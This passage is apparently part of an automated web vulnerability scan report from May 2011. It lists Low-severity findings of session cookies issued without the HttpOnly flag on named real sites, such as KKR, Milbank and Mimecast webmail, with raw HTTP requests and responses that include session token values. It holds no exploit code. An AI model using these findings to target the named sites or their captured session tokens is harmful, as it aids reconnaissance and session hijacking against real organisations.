Connection: close
Content-Length: 6664

trc_json_response =
{"trc":{"req":"9aa75fd4081f69b5978bd39a0832d6cc","session-id":"96312820aedf9fdd5216e070e722f405","session-data":"v1_96312820aedf9fdd5216e070e722f405_d80f7856-eeab-487a-988c-f15ce2f
...[SNIP]...

14.21. https://webmail-us.mimecast.com/webMail/login.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://webmail-us.mimecast.com
Path:   /webMail/login.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webMail/login.jsp HTTP/1.1
Host: webmail-us.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 19:00:00 EST
Set-Cookie: JSESSIONID=A558B2D6AC4AE657DD0F627D7073BB13; Path=/webMail; Secure
Content-Type: text/html
Vary: Accept-Encoding
Date: Thu, 12 May 2011 12:34:17 GMT
Content-Length: 11504


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Mimecast Login</title>

...[SNIP]...

14.22. https://webmail.tuckerellis.com/exchweb/bin/auth/owaauth.dll

Summary

Severity:   Low
Confidence:   Firm
Host:   https://webmail.tuckerellis.com
Path:   /exchweb/bin/auth/owaauth.dll

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /exchweb/bin/auth/owaauth.dll HTTP/1.1
Host: webmail.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://webmail.tuckerellis.com/exchweb/bin/auth/owalogon.asp?url=https://webmail.tuckerellis.com/exchange&reason=0
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.11.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West
Content-Type: application/x-www-form-urlencoded
Content-Length: 117

destination=https%3A%2F%2Fwebmail.tuckerellis.com%2Fexchange&flags=4&username=&password=&SubmitCreds=Log+On&trusted=4

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://webmail.tuckerellis.com/exchange
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: sessionid=15a97208-bb3b-4ddc-80a0-5c9c656a7d79; path=/
Set-Cookie: cadata="6WdwQVCBbctZn0rLEzGKc1Dh9KPVSIJ4Y4z3MLg=="; HttpOnly; secure; path=/
Date: Thu, 12 May 2011 12:35:12 GMT


14.23. https://ww3.janus.com/advisor/about-janus

Summary

Severity:   Low
Confidence:   Firm
Host:   https://ww3.janus.com
Path:   /advisor/about-janus

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /advisor/about-janus?WT.mc_id=102162&WT.srch=1 HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server:
Cache-Control: no-store
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
X-Powered-By: JSP/2.1
Set-Cookie: JSESSIONID=3eb42bec6b9f100ffd3113f47057; Path=/advisor
Content-Type: text/html;charset=UTF-8
Date: Thu, 12 May 2011 11:15:36 GMT
Set-Cookie: vj-ww3-advisor=3557560492.20480.0000; path=/
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 26435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<h
...[SNIP]...

14.24. http://www.ams-legal.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ams-legal.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.ams-legal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:32:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4920
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCDBQTBR=GNMNHADBFLOMMFBCGBHFLNHO; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Con
...[SNIP]...

14.25. http://www.apolloic.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.apolloic.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.apolloic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Date: Thu, 12 May 2011 11:40:50 GMT
Content-Length: 136
Content-Type: text/html
Location: public/home.asp
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDCCDBARRT=DFIJJBNBJJANFCMBIGHMAEIC; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="public/home.asp">here</a>.</body>

14.26. http://www.conferenceservers.com/browser/proxy.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.conferenceservers.com
Path:   /browser/proxy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browser/proxy.asp HTTP/1.1
Host: www.conferenceservers.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.soundpatheview.com/

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR OPTa BUS OTC"
X-UA-Compatible: IE=EmulateIE8
X-Powered-By: ASP.NET
Content-Length: 843
Content-Type: text/html
Cache-Control: private
Date: Thu, 12 May 2011 12:25:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ASPSESSIONIDQCAATBRT=MCBAGIKBAKINNJGFEALBPACN; path=/


// WebDialogs WebInterpoint Client Login Utilities
// This file contains functions which are commonly used by login pages.

var proxy='173.193.214.243'; // This value was detected server side
fu
...[SNIP]...

14.27. http://www.dmoc.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dmoc.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.dmoc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Diserio+Martin+O%27Connor+%26+Castiglioni&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:19:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
ETag: "8613988e24a0a3d3f954f30e88bb50ea"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Set-Cookie: SESS97997ab7f65dbfa3475cc6e258e81de7=959b2d7543b91794550623991d8a8d37; expires=Sat, 04-Jun-2011 15:53:02 GMT; path=/; domain=.dmoc.com
Last-Modified: Thu, 12 May 2011 05:21:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

14.28. http://www.elawmarketing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.elawmarketing.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.elawmarketing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/practice-areas.html

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:00:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: SESS12e590b5abdc44fd41146e46388173a1=c8f73722530b0816abc1b10d32d412d7; expires=Sat, 04-Jun-2011 15:33:34 GMT; path=/; domain=.elawmarketing.com
Last-Modified: Thu, 12 May 2011 12:00:14 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 48659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equi
...[SNIP]...

14.29. http://www.huroncapital.com/secure/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.huroncapital.com
Path:   /secure/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure/ HTTP/1.1
Host: www.huroncapital.com
Proxy-Connection: keep-alive
Referer: http://www.huroncapital.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:13:52 GMT
Server: Apache/1.3.37 (Unix)
AuthUser: -
Set-Cookie: SESSIONID=9d65c422a80d78d0b2c9cee35d9a8062; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8870

<html>

   <head>
       <meta http-equiv="Content-Language" content="en-us">
       <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
       <meta name="generator" content="Adobe GoLive
...[SNIP]...

14.30. http://www.kkr.com/company/landmark_achievements.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kkr.com
Path:   /company/landmark_achievements.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/landmark_achievements.cfm HTTP/1.1
Host: www.kkr.com
Proxy-Connection: keep-alive
Referer: http://www.kkr.com/kpe/private_equity_overview.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KKR_SESSION=1255535544%7C%20%7Bts%20%272011%2D05%2D12%2007%3A05%3A17%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A04%3A28%27%7D%7C02BFE1A4038FE2017EA64DD19D3BAF2E; KKR_BRIEFCASE=UPDATED%7C40585%2E2953356

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:08:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: KKR_SESSION=1255535544%7C%20%7Bts%20%272011%2D05%2D12%2007%3A05%3A17%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A08%3A06%27%7D%7C02BFE1A4038FE2017EA64DD19D3BAF2E;domain=www.kkr.com;expires=Fri, 11-May-2012 11:08:06 GMT;path=/
Set-Cookie: KKR_BRIEFCASE=UPDATED%7C40585%2E2953356;domain=www.kkr.com;expires=Fri, 11-May-2012 11:08:06 GMT;path=/
Set-Cookie: KKR_PREVIEW=;expires=Wed, 12-May-2010 11:08:06 GMT;path=/
Vary: Accept-Encoding
Content-Length: 13053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; c
...[SNIP]...

14.31. http://www.kkr.com/investor/investor_relations_overview.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kkr.com
Path:   /investor/investor_relations_overview.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /investor/investor_relations_overview.cfm HTTP/1.1
Host: www.kkr.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:04:19 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: KKR_SESSION=1255536235%7C%20%7Bts%20%272011%2D05%2D12%2007%3A04%3A19%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A04%3A19%27%7D%7CC8FCB2495904E459807FEEF5EC5F38A9;domain=www.kkr.com;expires=Fri, 11-May-2012 11:04:19 GMT;path=/
Set-Cookie: KKR_BRIEFCASE=UPDATED%7C40585%2E2946644;domain=www.kkr.com;expires=Fri, 11-May-2012 11:04:19 GMT;path=/
Set-Cookie: KKR_PREVIEW=;expires=Wed, 12-May-2010 11:04:19 GMT;path=/
Vary: Accept-Encoding
Content-Length: 8289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; c
...[SNIP]...

14.32. http://www.kkr.com/kpe/private_equity_overview.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kkr.com
Path:   /kpe/private_equity_overview.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /kpe/private_equity_overview.cfm HTTP/1.1
Host: www.kkr.com
Proxy-Connection: keep-alive
Referer: http://www.kkr.com/investor/investor_relations_overview.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KKR_SESSION=1255535544%7C%20%7Bts%20%272011%2D05%2D12%2007%3A05%3A17%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A05%3A17%27%7D%7C02BFE1A4038FE2017EA64DD19D3BAF2E; KKR_BRIEFCASE=UPDATED%7C40585%2E2953356

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:06:12 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: KKR_SESSION=1255535544%7C%20%7Bts%20%272011%2D05%2D12%2007%3A05%3A17%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A06%3A12%27%7D%7C02BFE1A4038FE2017EA64DD19D3BAF2E;domain=www.kkr.com;expires=Fri, 11-May-2012 11:06:12 GMT;path=/
Set-Cookie: KKR_BRIEFCASE=UPDATED%7C40585%2E2953356;domain=www.kkr.com;expires=Fri, 11-May-2012 11:06:12 GMT;path=/
Set-Cookie: KKR_PREVIEW=;expires=Wed, 12-May-2010 11:06:12 GMT;path=/
Vary: Accept-Encoding
Content-Length: 11703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; c
...[SNIP]...

14.33. http://www.kkr.com/team/theteam.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kkr.com
Path:   /team/theteam.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /team/theteam.cfm HTTP/1.1
Host: www.kkr.com
Proxy-Connection: keep-alive
Referer: http://www.kkr.com/company/landmark_achievements.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KKR_SESSION=1255535544%7C%20%7Bts%20%272011%2D05%2D12%2007%3A05%3A17%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A04%3A42%27%7D%7C02BFE1A4038FE2017EA64DD19D3BAF2E; KKR_BRIEFCASE=UPDATED%7C40585%2E2953356

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:06:21 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: KKR_SESSION=1255535544%7C%20%7Bts%20%272011%2D05%2D12%2007%3A05%3A17%27%7D%7C%20%7Bts%20%272011%2D05%2D12%2007%3A06%3A20%27%7D%7C02BFE1A4038FE2017EA64DD19D3BAF2E;domain=www.kkr.com;expires=Fri, 11-May-2012 11:06:21 GMT;path=/
Set-Cookie: KKR_BRIEFCASE=UPDATED%7C40585%2E2953356;domain=www.kkr.com;expires=Fri, 11-May-2012 11:06:21 GMT;path=/
Set-Cookie: KKR_PREVIEW=;expires=Wed, 12-May-2010 11:06:21 GMT;path=/
Vary: Accept-Encoding
Content-Length: 45588


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; c
...[SNIP]...

14.34. http://www.korteco.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.korteco.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.korteco.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:11:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS31e5fbde7def436979bdb9291b5781da=kqafn01oinjtbje997dusc7ce2; expires=Sat, 04 Jun 2011 16:44:44 GMT; path=/; domain=.korteco.com
Last-Modified: Thu, 12 May 2011 12:45:12 GMT
ETag: "66bb27227b2dbbabf0e8363239bdacb3"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...

14.35. http://www.milbank.com/en

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.milbank.com
Path:   /en

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en HTTP/1.1
Host: www.milbank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:21:33 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=fsdizi55e3qmfmfninni5v2j; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22589


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
   <HEAD>
       <title>
           Milbank Home Page</title>
       <meta content="
...[SNIP]...

14.36. http://www.pillsburylaw.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812913;path=/
Set-Cookie: CFTOKEN=26160612;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 12:22:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...

14.37. http://www.pillsburylaw.com/connect_forgotpassword.cfm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /connect_forgotpassword.cfm?p=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=60
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.5.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:32:11 GMT
Connection: close


